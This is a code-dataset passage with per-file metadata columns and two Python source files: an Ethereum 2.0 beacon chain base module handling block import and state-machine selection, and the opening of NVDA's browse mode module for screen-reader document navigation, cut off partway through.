hexsha
stringlengths 40
40
| size
int64 133
946k
| ext
stringclasses 7
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
192
| max_stars_repo_name
stringlengths 6
125
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
9
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
192
| max_issues_repo_name
stringlengths 6
125
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
9
| max_issues_count
int64 1
116k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
192
| max_forks_repo_name
stringlengths 6
125
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
9
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 133
946k
| avg_line_length
float64 5.01
99.2
| max_line_length
int64 17
999
| alphanum_fraction
float64 0.28
0.9
| qsc_code_num_words_quality_signal
int64 30
120k
| qsc_code_num_chars_quality_signal
float64 133
946k
| qsc_code_mean_word_length_quality_signal
float64 2
10
| qsc_code_frac_words_unique_quality_signal
float64 0.03
1
| qsc_code_frac_chars_top_2grams_quality_signal
float64 0
0.2
| qsc_code_frac_chars_top_3grams_quality_signal
float64 0
0.18
| qsc_code_frac_chars_top_4grams_quality_signal
float64 0
0.16
| qsc_code_frac_chars_dupe_5grams_quality_signal
float64 0
0.8
| qsc_code_frac_chars_dupe_6grams_quality_signal
float64 0
0.7
| qsc_code_frac_chars_dupe_7grams_quality_signal
float64 0
0.7
| qsc_code_frac_chars_dupe_8grams_quality_signal
float64 0
0.7
| qsc_code_frac_chars_dupe_9grams_quality_signal
float64 0
0.7
| qsc_code_frac_chars_dupe_10grams_quality_signal
float64 0
0.6
| qsc_code_frac_chars_replacement_symbols_quality_signal
float64 0
0.01
| qsc_code_frac_chars_digital_quality_signal
float64 0
0.2
| qsc_code_frac_chars_whitespace_quality_signal
float64 0.03
0.5
| qsc_code_size_file_byte_quality_signal
float64 133
946k
| qsc_code_num_lines_quality_signal
float64 10
23.3k
| qsc_code_num_chars_line_max_quality_signal
float64 18
1k
| qsc_code_num_chars_line_mean_quality_signal
float64 5.09
99.2
| qsc_code_frac_chars_alphabet_quality_signal
float64 0.5
0.96
| qsc_code_frac_chars_comments_quality_signal
float64 0
0.8
| qsc_code_cate_xml_start_quality_signal
float64 0
0
| qsc_code_frac_lines_dupe_lines_quality_signal
float64 0
0.7
| qsc_code_cate_autogen_quality_signal
float64 0
0
| qsc_code_frac_lines_long_string_quality_signal
float64 0
0.2
| qsc_code_frac_chars_string_length_quality_signal
float64 0
0.6
| qsc_code_frac_chars_long_word_length_quality_signal
float64 0
0.4
| qsc_code_frac_lines_string_concat_quality_signal
float64 0
0.37
| qsc_code_cate_encoded_data_quality_signal
float64 0
0
| qsc_code_frac_chars_hex_words_quality_signal
float64 0
0.32
| qsc_code_frac_lines_prompt_comments_quality_signal
float64 0
0.01
| qsc_code_frac_lines_assert_quality_signal
float64 0
0.4
| qsc_codepython_cate_ast_quality_signal
float64 1
1
| qsc_codepython_frac_lines_func_ratio_quality_signal
float64 0
0.2
| qsc_codepython_cate_var_zero_quality_signal
bool 1
class | qsc_codepython_frac_lines_pass_quality_signal
float64 0.05
1
| qsc_codepython_frac_lines_import_quality_signal
float64 0
0.3
| qsc_codepython_frac_lines_simplefunc_quality_signal
float64 0
0.1
| qsc_codepython_score_lines_no_logic_quality_signal
float64 0
1.5
| qsc_codepython_frac_lines_print_quality_signal
float64 0
0.4
| qsc_code_num_words
int64 0
0
| qsc_code_num_chars
int64 0
0
| qsc_code_mean_word_length
int64 0
0
| qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 0
0
| qsc_code_frac_chars_top_3grams
int64 0
0
| qsc_code_frac_chars_top_4grams
int64 0
0
| qsc_code_frac_chars_dupe_5grams
int64 0
0
| qsc_code_frac_chars_dupe_6grams
int64 0
0
| qsc_code_frac_chars_dupe_7grams
int64 0
0
| qsc_code_frac_chars_dupe_8grams
int64 0
0
| qsc_code_frac_chars_dupe_9grams
int64 0
0
| qsc_code_frac_chars_dupe_10grams
int64 0
0
| qsc_code_frac_chars_replacement_symbols
int64 0
0
| qsc_code_frac_chars_digital
int64 0
0
| qsc_code_frac_chars_whitespace
int64 0
0
| qsc_code_size_file_byte
int64 0
0
| qsc_code_num_lines
int64 0
0
| qsc_code_num_chars_line_max
int64 0
0
| qsc_code_num_chars_line_mean
int64 0
0
| qsc_code_frac_chars_alphabet
int64 0
0
| qsc_code_frac_chars_comments
int64 0
0
| qsc_code_cate_xml_start
int64 0
0
| qsc_code_frac_lines_dupe_lines
int64 0
0
| qsc_code_cate_autogen
int64 0
0
| qsc_code_frac_lines_long_string
int64 0
0
| qsc_code_frac_chars_string_length
int64 0
0
| qsc_code_frac_chars_long_word_length
int64 0
0
| qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 0
0
| qsc_code_frac_chars_hex_words
int64 0
0
| qsc_code_frac_lines_prompt_comments
int64 0
0
| qsc_code_frac_lines_assert
int64 0
0
| qsc_codepython_cate_ast
int64 0
0
| qsc_codepython_frac_lines_func_ratio
int64 0
0
| qsc_codepython_cate_var_zero
int64 0
0
| qsc_codepython_frac_lines_pass
int64 1
1
| qsc_codepython_frac_lines_import
int64 0
0
| qsc_codepython_frac_lines_simplefunc
int64 0
0
| qsc_codepython_score_lines_no_logic
int64 0
0
| qsc_codepython_frac_lines_print
int64 0
0
| effective
stringclasses 1
value | hits
int64 1
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
d9b79f86fa592dbe24c72c454192af966a916a5a
| 12,444
|
py
|
Python
|
eth2/beacon/chains/base.py
|
mhchia/trinity
|
e40e475064ca4605887706e9b0e4f8e2349b10cd
|
[
"MIT"
] | null | null | null |
eth2/beacon/chains/base.py
|
mhchia/trinity
|
e40e475064ca4605887706e9b0e4f8e2349b10cd
|
[
"MIT"
] | null | null | null |
eth2/beacon/chains/base.py
|
mhchia/trinity
|
e40e475064ca4605887706e9b0e4f8e2349b10cd
|
[
"MIT"
] | null | null | null |
from abc import (
ABC,
abstractmethod,
)
import logging
from typing import (
TYPE_CHECKING,
Tuple,
Type,
)
from eth._utils.datatypes import (
Configurable,
)
from eth.db.backends.base import (
BaseAtomicDB,
)
from eth.exceptions import (
BlockNotFound,
)
from eth.validation import (
validate_word,
)
from eth_typing import (
Hash32,
)
from eth_utils import (
ValidationError,
encode_hex,
)
from eth2._utils.ssz import (
validate_imported_block_unchanged,
)
from eth2.beacon.db.chain import (
BaseBeaconChainDB,
BeaconChainDB,
)
from eth2.beacon.exceptions import (
BlockClassError,
StateMachineNotFound,
)
from eth2.beacon.types.blocks import (
BaseBeaconBlock,
)
from eth2.beacon.types.states import (
BeaconState,
)
from eth2.beacon.typing import (
FromBlockParams,
Slot,
)
from eth2.beacon.validation import (
validate_slot,
)
if TYPE_CHECKING:
from eth2.beacon.state_machines.base import ( # noqa: F401
BaseBeaconStateMachine,
)
class BaseBeaconChain(Configurable, ABC):
    """
    The base class for all BeaconChain objects.

    Declares the abstract interface a concrete chain (e.g. ``BeaconChain``)
    must provide: database access, genesis initialization, state machine
    selection, and block retrieval/import.
    """
    # Instance-level database wrapper giving access to persisted blocks and states.
    chaindb = None  # type: BaseBeaconChainDB
    # Concrete ``BaseBeaconChainDB`` subclass used to construct ``chaindb``.
    chaindb_class = None  # type: Type[BaseBeaconChainDB]
    # Ordered (start_slot, StateMachine class) pairs; scanned newest-first by
    # ``get_state_machine_class_for_block_slot`` in concrete implementations.
    sm_configuration = None  # type: Tuple[Tuple[Slot, Type[BaseBeaconStateMachine]], ...]
    # Identifier of the chain this class is configured for.
    chain_id = None  # type: int
    #
    # Helpers
    #
    @classmethod
    @abstractmethod
    def get_chaindb_class(cls) -> Type[BaseBeaconChainDB]:
        """Return the class used to instantiate ``chaindb``."""
        pass
    #
    # Chain API
    #
    @classmethod
    @abstractmethod
    def from_genesis(cls,
                     base_db: BaseAtomicDB,
                     genesis_state: BeaconState,
                     genesis_block: BaseBeaconBlock) -> 'BaseBeaconChain':
        """Initialize a chain instance from a genesis state and block."""
        pass
    #
    # State Machine API
    #
    @classmethod
    @abstractmethod
    def get_state_machine_class(
            cls,
            block: BaseBeaconBlock) -> Type['BaseBeaconStateMachine']:
        """Return the ``StateMachine`` class responsible for the given block."""
        pass
    @abstractmethod
    def get_state_machine(self, at_block: BaseBeaconBlock=None) -> 'BaseBeaconStateMachine':
        """Return a ``StateMachine`` instance anchored at ``at_block``."""
        pass
    @classmethod
    @abstractmethod
    def get_state_machine_class_for_block_slot(
            cls,
            slot: Slot) -> Type['BaseBeaconStateMachine']:
        """Return the ``StateMachine`` class responsible for the given slot."""
        pass
    #
    # Block API
    #
    @abstractmethod
    def get_block_class(self, block_root: Hash32) -> Type[BaseBeaconBlock]:
        """Return the block class in effect at the slot of ``block_root``."""
        pass
    @abstractmethod
    def create_block_from_parent(self,
                                 parent_block: BaseBeaconBlock,
                                 block_params: FromBlockParams) -> BaseBeaconBlock:
        """Build a new (empty) block descending from ``parent_block``."""
        pass
    @abstractmethod
    def get_block_by_root(self, block_root: Hash32) -> BaseBeaconBlock:
        """Return the block with the given root."""
        pass
    @abstractmethod
    def get_canonical_head(self) -> BaseBeaconBlock:
        """Return the block at the head of the canonical chain."""
        pass
    @abstractmethod
    def get_score(self, block_root: Hash32) -> int:
        """Return the fork-choice score of the block with the given root."""
        pass
    @abstractmethod
    def ensure_block(self, block: BaseBeaconBlock=None) -> BaseBeaconBlock:
        """Return ``block`` or, when ``None``, a block built on the canonical head."""
        pass
    @abstractmethod
    def get_block(self) -> BaseBeaconBlock:
        """Return the current TIP block."""
        pass
    @abstractmethod
    def get_canonical_block_by_slot(self, slot: Slot) -> BaseBeaconBlock:
        """Return the canonical block at ``slot``."""
        pass
    @abstractmethod
    def get_canonical_block_root(self, slot: Slot) -> Hash32:
        """Return the canonical block root at ``slot``."""
        pass
    @abstractmethod
    def import_block(
            self,
            block: BaseBeaconBlock,
            perform_validation: bool=True
    ) -> Tuple[BaseBeaconBlock, Tuple[BaseBeaconBlock, ...], Tuple[BaseBeaconBlock, ...]]:
        """Import ``block``; return (imported, new canonical, de-canonicalized) blocks."""
        pass
class BeaconChain(BaseBeaconChain):
    """
    A Chain is a combination of one or more ``StateMachine`` classes.  Each
    ``StateMachine`` covers a range of slots; the chain acts as a thin wrapper,
    delegating each operation to whichever ``StateMachine`` is responsible for
    the slot of the block being operated on.
    """
    logger = logging.getLogger("eth2.beacon.chains.BeaconChain")

    chaindb_class = BeaconChainDB  # type: Type[BaseBeaconChainDB]

    def __init__(self, base_db: BaseAtomicDB) -> None:
        """
        Construct the chain over ``base_db``.

        Raises ``ValueError`` when the class was declared without any
        ``sm_configuration`` entries.
        """
        if not self.sm_configuration:
            raise ValueError(
                "The Chain class cannot be instantiated with an empty `sm_configuration`"
            )
        # TODO: implement and call validate_sm_configuration(self.sm_configuration)
        self.chaindb = self.get_chaindb_class()(base_db)

    #
    # Helpers
    #
    @classmethod
    def get_chaindb_class(cls) -> Type['BaseBeaconChainDB']:
        """Return the configured chain database class; raise if unset."""
        if cls.chaindb_class is None:
            raise AttributeError("`chaindb_class` not set")
        return cls.chaindb_class

    #
    # Chain API
    #
    @classmethod
    def from_genesis(cls,
                     base_db: BaseAtomicDB,
                     genesis_state: BeaconState,
                     genesis_block: BaseBeaconBlock) -> 'BaseBeaconChain':
        """
        Initialize the ``BeaconChain`` from a genesis state.

        The genesis block must be of the exact block class used by the
        ``StateMachine`` responsible for the genesis slot.
        """
        machine_class = cls.get_state_machine_class_for_block_slot(genesis_block.slot)
        if type(genesis_block) != machine_class.block_class:
            raise BlockClassError(
                "Given genesis block class: {}, StateMachine.block_class: {}".format(
                    type(genesis_block),
                    machine_class.block_class
                )
            )
        # Persist the genesis state before writing the genesis block.
        cls.get_chaindb_class()(db=base_db).persist_state(genesis_state)
        return cls._from_genesis_block(base_db, genesis_block)

    @classmethod
    def _from_genesis_block(cls,
                            base_db: BaseAtomicDB,
                            genesis_block: BaseBeaconBlock) -> 'BaseBeaconChain':
        """
        Persist the genesis block and construct the chain instance.
        """
        db = cls.get_chaindb_class()(db=base_db)
        db.persist_block(genesis_block, genesis_block.__class__)
        return cls(base_db)

    #
    # StateMachine API
    #
    @classmethod
    def get_state_machine_class(cls, block: BaseBeaconBlock) -> Type['BaseBeaconStateMachine']:
        """
        Return the ``StateMachine`` class responsible for the given block's slot.
        """
        return cls.get_state_machine_class_for_block_slot(block.slot)

    @classmethod
    def get_state_machine_class_for_block_slot(
            cls,
            slot: Slot) -> Type['BaseBeaconStateMachine']:
        """
        Return the ``StateMachine`` class for the given block slot number.

        Scans ``sm_configuration`` from the newest fork backwards and picks the
        first entry whose start slot does not exceed ``slot``.
        """
        if cls.sm_configuration is None:
            raise AttributeError("Chain classes must define the StateMachines in sm_configuration")
        validate_slot(slot)
        match = next(
            (
                machine_class
                for start_slot, machine_class in reversed(cls.sm_configuration)
                if slot >= start_slot
            ),
            None,
        )
        if match is None:
            raise StateMachineNotFound("No StateMachine available for block slot: #{0}".format(slot))
        return match

    def get_state_machine(self, at_block: BaseBeaconBlock=None) -> 'BaseBeaconStateMachine':
        """
        Return a ``StateMachine`` instance anchored at ``at_block`` (or at a
        block built on the canonical head when ``at_block`` is ``None``).
        """
        target_block = self.ensure_block(at_block)
        machine_class = self.get_state_machine_class_for_block_slot(target_block.slot)
        return machine_class(
            chaindb=self.chaindb,
            block=target_block,
        )

    #
    # Block API
    #
    def get_block_class(self, block_root: Hash32) -> Type[BaseBeaconBlock]:
        """Return the block class in effect at the slot of ``block_root``."""
        slot = self.chaindb.get_slot_by_root(block_root)
        return self.get_state_machine_class_for_block_slot(slot).block_class

    def create_block_from_parent(self,
                                 parent_block: BaseBeaconBlock,
                                 block_params: FromBlockParams) -> BaseBeaconBlock:
        """
        Passthrough helper to the ``StateMachine`` class of the block descending
        from the given block.
        """
        if block_params.slot is None:
            child_slot = parent_block.slot + 1
        else:
            child_slot = block_params.slot
        machine_class = self.get_state_machine_class_for_block_slot(slot=child_slot)
        return machine_class.create_block_from_parent(parent_block, block_params)

    def get_block_by_root(self, block_root: Hash32) -> BaseBeaconBlock:
        """
        Return the requested block as specified by block hash.
        Raise ``BlockNotFound`` if there's no block with the given hash in the db.
        """
        validate_word(block_root, title="Block Hash")
        return self.chaindb.get_block_by_root(block_root, self.get_block_class(block_root))

    def get_canonical_head(self) -> BaseBeaconBlock:
        """
        Return the block at the canonical chain head.
        Raise ``CanonicalHeadNotFound`` if there's no head defined for the canonical chain.
        """
        head_root = self.chaindb.get_canonical_head_root()
        return self.chaindb.get_block_by_root(head_root, self.get_block_class(head_root))

    def get_score(self, block_root: Hash32) -> int:
        """
        Return the score of the block with the given hash.
        Raise ``BlockNotFound`` if there is no matching block hash.
        """
        return self.chaindb.get_score(block_root)

    def ensure_block(self, block: BaseBeaconBlock=None) -> BaseBeaconBlock:
        """
        Return ``block`` unchanged when given; otherwise build a new block on
        top of the canonical head.
        """
        if block is not None:
            return block
        return self.create_block_from_parent(self.get_canonical_head(), FromBlockParams())

    def get_block(self) -> BaseBeaconBlock:
        """
        Return the current TIP block.
        """
        return self.get_state_machine().block

    def get_canonical_block_by_slot(self, slot: Slot) -> BaseBeaconBlock:
        """
        Return the block with the given number in the canonical chain.
        Raise ``BlockNotFound`` if there's no block with the given number in the
        canonical chain.
        """
        validate_slot(slot)
        return self.get_block_by_root(self.chaindb.get_canonical_block_root(slot))

    def get_canonical_block_root(self, slot: Slot) -> Hash32:
        """
        Return the block hash with the given number in the canonical chain.
        Raise ``BlockNotFound`` if there's no block with the given number in the
        canonical chain.
        """
        return self.chaindb.get_canonical_block_root(slot)

    def import_block(
            self,
            block: BaseBeaconBlock,
            perform_validation: bool=True
    ) -> Tuple[BaseBeaconBlock, Tuple[BaseBeaconBlock, ...], Tuple[BaseBeaconBlock, ...]]:
        """
        Import a complete block, returning a 3-tuple of:

        - the imported block
        - a tuple of blocks which are now part of the canonical chain
        - a tuple of blocks which were canonical and now are no longer canonical
        """
        try:
            parent = self.get_block_by_root(block.previous_block_root)
        except BlockNotFound:
            raise ValidationError(
                "Attempt to import block #{}. Cannot import block {} before importing "
                "its parent block at {}".format(
                    block.slot,
                    block.signed_root,
                    block.previous_block_root,
                )
            )
        scaffold_block = self.create_block_from_parent(
            parent,
            FromBlockParams(),
        )
        state, imported_block = self.get_state_machine(scaffold_block).import_block(block)
        if perform_validation:
            # Ensure the state machine did not mutate the block during import.
            validate_imported_block_unchanged(imported_block, block)
        # TODO: Now it just persists all state. Should design how to clean up the old state.
        self.chaindb.persist_state(state)
        new_canonical_blocks, old_canonical_blocks = self.chaindb.persist_block(
            imported_block,
            imported_block.__class__,
        )
        self.logger.debug(
            'IMPORTED_BLOCK: slot %s | signed root %s',
            imported_block.slot,
            encode_hex(imported_block.signed_root),
        )
        return imported_block, new_canonical_blocks, old_canonical_blocks
| 30.955224
| 99
| 0.634201
| 1,348
| 12,444
| 5.622404
| 0.141691
| 0.017417
| 0.025729
| 0.02375
| 0.485024
| 0.445046
| 0.38224
| 0.338831
| 0.288429
| 0.264283
| 0
| 0.003717
| 0.286564
| 12,444
| 401
| 100
| 31.032419
| 0.849966
| 0.180006
| 0
| 0.400794
| 0
| 0
| 0.064676
| 0.019259
| 0
| 0
| 0
| 0.004988
| 0
| 1
| 0.126984
| false
| 0.063492
| 0.115079
| 0
| 0.34127
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
d9f04eac1f39d4c14950ae0caf3dff21f18defd4
| 84,990
|
py
|
Python
|
source/browseMode.py
|
neal-hub/nvda-test
|
4c3a67b2eafa9721c5de3f671d10e60ab2d43865
|
[
"bzip2-1.0.6"
] | 1
|
2022-02-20T23:10:39.000Z
|
2022-02-20T23:10:39.000Z
|
source/browseMode.py
|
neal-hub/nvda-test
|
4c3a67b2eafa9721c5de3f671d10e60ab2d43865
|
[
"bzip2-1.0.6"
] | null | null | null |
source/browseMode.py
|
neal-hub/nvda-test
|
4c3a67b2eafa9721c5de3f671d10e60ab2d43865
|
[
"bzip2-1.0.6"
] | null | null | null |
# A part of NonVisual Desktop Access (NVDA)
# Copyright (C) 2007-2021 NV Access Limited, Babbage B.V., James Teh, Leonard de Ruijter,
# Thomas Stivers, Accessolutions, Julien Cochuyt
# This file is covered by the GNU General Public License.
# See the file COPYING for more details.
from typing import Any, Callable, Union
import os
import itertools
import collections
import winsound
import time
import weakref
import wx
import core
from logHandler import log
import documentBase
import review
import scriptHandler
import eventHandler
import nvwave
import queueHandler
import gui
import ui
import cursorManager
from scriptHandler import script, isScriptWaiting, willSayAllResume
import aria
import controlTypes
from controlTypes import OutputReason
import config
import textInfos
import braille
import vision
import speech
from speech import sayAll
import treeInterceptorHandler
import inputCore
import api
import gui.guiHelper
from gui.dpiScalingHelper import DpiScalingHelperMixinWithoutInit
from NVDAObjects import NVDAObject
import gui.contextHelp
from abc import ABCMeta, abstractmethod
import globalVars
from typing import Optional
def reportPassThrough(treeInterceptor,onlyIfChanged=True):
	"""Reports the pass through mode if it has changed, either as a sound
	(when the passThroughAudioIndication setting is enabled) or as a spoken message.
	@param treeInterceptor: The current Browse Mode treeInterceptor.
	@type treeInterceptor: L{BrowseModeTreeInterceptor}
	@param onlyIfChanged: if true reporting will not happen if the last reportPassThrough reported the same thing.
	@type onlyIfChanged: bool
	"""
	if onlyIfChanged and treeInterceptor.passThrough == reportPassThrough.last:
		return
	if config.conf["virtualBuffers"]["passThroughAudioIndication"]:
		fileName = "focusMode.wav" if treeInterceptor.passThrough else "browseMode.wav"
		nvwave.playWaveFile(os.path.join(globalVars.appDir, "waves", fileName))
	elif treeInterceptor.passThrough:
		# Translators: The mode to interact with controls in documents
		ui.message(_("Focus mode"))
	else:
		# Translators: The mode that presents text in a flat representation
		# that can be navigated with the cursor keys like in a text document
		ui.message(_("Browse mode"))
	reportPassThrough.last = treeInterceptor.passThrough
#: The pass through state most recently reported by this function.
reportPassThrough.last = False
def mergeQuickNavItemIterators(iterators,direction="next"):
	"""
	Merges multiple iterators that emit L{QuickNavItem} objects, yielding them from first to last.
	They are sorted using min or max (__lt__ should be implemented on the L{QuickNavItem} objects).
	@param iterators: the iterators you want to merge.
	@type iterators: sequence of iterators that emit L{QuickNavItem} objects.
	@param direction: the direction these iterators are searching (e.g. next, previous)
	@type direction: string
	"""
	pick = min if direction == "next" else max
	# Working list of (iterator, headValue) pairs, seeded with each
	# iterator's first value; exhausted iterators are simply skipped.
	pending = []
	for iterator in iterators:
		try:
			head = next(iterator)
		except StopIteration:
			continue
		pending.append((iterator, head))
	# Repeatedly emit the best (minimum or maximum) head value and refill
	# the slot from the iterator that produced it, dropping it once empty.
	while pending:
		best = pick(pending, key=lambda pair: pair[1])
		pending.remove(best)
		iterator, value = best
		yield value
		try:
			pending.append((iterator, next(iterator)))
		except StopIteration:
			pass
class QuickNavItem(object, metaclass=ABCMeta):
	""" Emitted by L{BrowseModeTreeInterceptor._iterNodesByType}, this represents one of many positions in a browse mode document, based on the type of item being searched for (e.g. link, heading, table etc)."""

	itemType=None #: The type of items searched for (e.g. link, heading, table etc)
	label=None #: The label that should represent this item in the Elements list.
	isAfterSelection=False #: Is this item positioned after the caret in the document? Used by the elements list to place its own selection.

	def __init__(self,itemType,document):
		"""
		@param itemType: the type that was searched for (e.g. link, heading, table etc)
		@type itemType: string
		@param document: the browse mode document this item is a part of.
		@type document: L{BrowseModeTreeInterceptor}
		"""
		self.itemType=itemType
		self.document=document

	@abstractmethod
	def isChild(self,parent):
		"""
		Is this item a child of the given parent?
		This is used when representing items in a hierarchical tree structure, such as the Elements List.
		@param parent: the item of whom this item may be a child of.
		@type parent: L{QuickNavItem}
		@return: True if this item is a child, false otherwise.
		@rtype: bool
		"""
		raise NotImplementedError

	@abstractmethod
	def report(self,readUnit=None):
		"""
		Reports the contents of this item.
		@param readUnit: the optional unit (e.g. line, paragraph) that should be used to announce the item position when moved to. If not given, then the full size of the item is used.
		@type readUnit: a L{textInfos}.UNIT_* constant.
		"""
		raise NotImplementedError

	@abstractmethod
	def moveTo(self):
		"""
		Moves the browse mode caret or focus to this item.
		"""
		raise NotImplementedError

	# Note: activate and rename are deliberately not abstract; subclasses that
	# support these operations override them, others inherit the raising stubs.
	def activate(self):
		"""
		Activates this item's position. E.g. follows a link, presses a button etc.
		@raise NotImplementedError: if activation is not supported by this item type.
		"""
		raise NotImplementedError

	def rename(self,newName):
		"""
		Renames this item with the new name.
		@param newName: the new name for this item.
		@type newName: string
		@raise NotImplementedError: if renaming is not supported (see L{isRenameAllowed}).
		"""
		raise NotImplementedError

	@property
	def isRenameAllowed(self):
		# Whether this item supports renaming via L{rename}; False by default.
		return False
class TextInfoQuickNavItem(QuickNavItem):
	""" Represents a quick nav item in a browse mode document who's positions are represented by a L{textInfos.TextInfo}. """

	def __init__(self,itemType,document,textInfo):
		"""
		See L{QuickNavItem.__init__} for itemType and document argument definitions.
		@param textInfo: the textInfo position this item represents.
		@type textInfo: L{textInfos.TextInfo}
		"""
		self.textInfo=textInfo
		super(TextInfoQuickNavItem,self).__init__(itemType,document)

	def __lt__(self,other):
		# Order items by document position so iterators of items can be merged
		# with min/max (see mergeQuickNavItemIterators).
		return self.textInfo.compareEndPoints(other.textInfo,"startToStart")<0

	@property
	def obj(self):
		# The NVDAObject the TextInfo was based on, when there is one; otherwise None.
		return self.textInfo.basePosition if isinstance(self.textInfo.basePosition,NVDAObject) else None

	@property
	def label(self):
		# Default label: the stripped text covered by this item's range.
		return self.textInfo.text.strip()

	def isChild(self,parent):
		# An item counts as a child when its range overlaps the parent's range.
		if parent.textInfo.isOverlapping(self.textInfo):
			return True
		return False

	def report(self,readUnit=None):
		"""Speak this item's content, optionally limited to readUnit (a textInfos.UNIT_* constant)."""
		info=self.textInfo
		# If we are dealing with a form field, ensure we don't read the whole content if it's an editable text.
		if self.itemType == "formField":
			if self.obj.role == controlTypes.Role.EDITABLETEXT:
				readUnit = textInfos.UNIT_LINE
		if readUnit:
			fieldInfo = info.copy()
			info.collapse()
			info.move(readUnit, 1, endPoint="end")
			if info.compareEndPoints(fieldInfo, "endToEnd") > 0:
				# We've expanded past the end of the field, so limit to the end of the field.
				info.setEndPoint(fieldInfo, "endToEnd")
		speech.speakTextInfo(info, reason=OutputReason.QUICKNAV)

	def activate(self):
		# Delegate activation to the TextInfo's owning object.
		self.textInfo.obj._activatePosition(info=self.textInfo)

	def moveTo(self):
		"""Move focus (in pass through with a focusable object) or the browse mode caret to this item."""
		if self.document.passThrough and getattr(self, "obj", False):
			if controlTypes.State.FOCUSABLE in self.obj.states:
				self.obj.setFocus()
				return
			# Not focusable: drop out of pass through and fall back to moving the caret.
			self.document.passThrough = False
			reportPassThrough(self.document)
		info = self.textInfo.copy()
		info.collapse()
		self.document._set_selection(info, reason=OutputReason.QUICKNAV)

	@property
	def isAfterSelection(self):
		# True when this item starts after the current browse mode caret position.
		caret=self.document.makeTextInfo(textInfos.POSITION_CARET)
		return self.textInfo.compareEndPoints(caret, "startToStart") > 0

	def _getLabelForProperties(self, labelPropertyGetter: Callable[[str], Optional[Any]]):
		"""
		Fetches required properties for this L{TextInfoQuickNavItem} and constructs a label to be shown in an elements list.
		This can be used by subclasses to implement the L{label} property.
		@Param labelPropertyGetter: A callable taking 1 argument, specifying the property to fetch.
		For example, if L{itemType} is landmark, the callable must return the landmark type when "landmark" is passed as the property argument.
		Alternative property names might be name or value.
		The callable must return None if the property doesn't exist.
		An expected callable might be get method on a L{Dict},
		or "lambda property: getattr(self.obj, property, None)" for an L{NVDAObject}.
		"""
		content = self.textInfo.text.strip()
		if self.itemType == "heading":
			# Output: displayed text of the heading.
			return content
		labelParts = None
		name = labelPropertyGetter("name")
		if self.itemType == "landmark":
			landmark = aria.landmarkRoles.get(labelPropertyGetter("landmark"))
			# Example output: main menu; navigation
			labelParts = (name, landmark)
		else:
			role: Union[controlTypes.Role, int] = labelPropertyGetter("role")
			role = controlTypes.Role(role)
			roleText = role.displayString
			# Translators: Reported label in the elements list for an element which has no name and value
			unlabeled = _("Unlabeled")
			realStates = labelPropertyGetter("states")
			labeledStates = " ".join(controlTypes.processAndLabelStates(role, realStates, OutputReason.FOCUS))
			if self.itemType == "formField":
				if role in (
					controlTypes.Role.BUTTON,
					controlTypes.Role.DROPDOWNBUTTON,
					controlTypes.Role.TOGGLEBUTTON,
					controlTypes.Role.SPLITBUTTON,
					controlTypes.Role.MENUBUTTON,
					controlTypes.Role.DROPDOWNBUTTONGRID,
					controlTypes.Role.TREEVIEWBUTTON
				):
					# Example output: Mute; toggle button; pressed
					labelParts = (content or name or unlabeled, roleText, labeledStates)
				else:
					# Example output: Find a repository...; edit; has auto complete; NVDA
					labelParts = (name or unlabeled, roleText, labeledStates, content)
			elif self.itemType in ("link", "button"):
				# Example output: You have unread notifications; visited
				labelParts = (content or name or unlabeled, labeledStates)
		# Join the non-empty parts with "; "; fall back to the raw content.
		if labelParts:
			label = "; ".join(lp for lp in labelParts if lp)
		else:
			label = content
		return label
class BrowseModeTreeInterceptor(treeInterceptorHandler.TreeInterceptor):
	"""TreeInterceptor providing browse mode behaviour for a document:
	switching between browse and focus (pass through) mode and handling
	single letter navigation. Document access itself is left to subclasses
	(see L{_iterNodesByType}).
	"""
	scriptCategory = inputCore.SCRCAT_BROWSEMODE
	#: Backing value for disableAutoPassThrough, queried in L{shouldPassThrough}.
	_disableAutoPassThrough = False
	#: Roles that represent an embedded application or dialog.
	APPLICATION_ROLES = (controlTypes.Role.APPLICATION, controlTypes.Role.DIALOG)
	def _get_currentNVDAObject(self):
		# Getter for currentNVDAObject: the object at the current browse mode
		# position. Concrete browse mode implementations must override this.
		raise NotImplementedError
	def _get_currentFocusableNVDAObject(self):
		# Getter for currentFocusableNVDAObject: the focusable object at the
		# start of the browse mode caret position.
		return self.makeTextInfo(textInfos.POSITION_CARET).focusableNVDAObjectAtStart
	def event_treeInterceptor_gainFocus(self):
		"""Triggered when this browse mode interceptor gains focus.
		This event is only fired upon entering this treeInterceptor when it was not the current treeInterceptor before.
		This is different to L{event_gainFocus}, which is fired when an object inside this treeInterceptor gains focus, even if that object is in the same treeInterceptor.
		"""
		# Announce the current browse/focus mode on entry.
		reportPassThrough(self)
ALWAYS_SWITCH_TO_PASS_THROUGH_ROLES = frozenset({
controlTypes.Role.COMBOBOX,
controlTypes.Role.EDITABLETEXT,
controlTypes.Role.LIST,
controlTypes.Role.LISTITEM,
controlTypes.Role.SLIDER,
